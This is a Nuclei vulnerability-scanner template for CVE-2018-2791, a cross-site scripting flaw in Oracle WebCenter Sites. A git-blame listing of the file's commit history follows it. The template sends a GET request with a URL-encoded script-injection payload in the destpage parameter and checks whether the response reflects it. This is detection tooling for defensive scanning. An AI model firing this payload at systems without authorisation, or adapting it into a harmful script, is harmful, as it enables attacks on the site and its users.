nuclei-templates/cves/CVE-2018-2791.yaml

id: cve-2018-2791

info:
  name: Oracle WebCenter Sites XSS
  author: madrobot
  severity: medium
  description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware
requests:
  - method: GET
    path:
      - "{{BaseURL}}/servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError"
    matchers:
      - type: word
        words:
          - "<h1xxx<scriptalert(1)</script"
        part: body
Normalized id fields to match schema regex 2020-09-15 19:25:55 +00:00			`id: cve-2018-2791`
Create Oracle WebCenter Sites XSS.yaml 2020-04-08 11:37:09 +00:00
			`info:`
			`name: Oracle WebCenter Sites XSS`
Update Oracle WebCenter Sites XSS.yaml 2020-04-08 11:43:51 +00:00			`author: madrobot`
			`severity: medium`
description bugs 2020-08-25 22:22:08 +00:00			`description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware`
Create Oracle WebCenter Sites XSS.yaml 2020-04-08 11:37:09 +00:00			`requests:`
			`- method: GET`
			`path:`
Update CVE-2018-2791.yaml 2020-08-26 07:34:18 +00:00			`- "{{BaseURL}}/servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError"`
Create Oracle WebCenter Sites XSS.yaml 2020-04-08 11:37:09 +00:00			`matchers:`
			`- type: word`
			`words:`
Update CVE-2018-2791.yaml 2020-08-26 07:31:07 +00:00			`- "<h1xxx<scriptalert(1)</script"`
Create Oracle WebCenter Sites XSS.yaml 2020-04-08 11:37:09 +00:00			`part: body`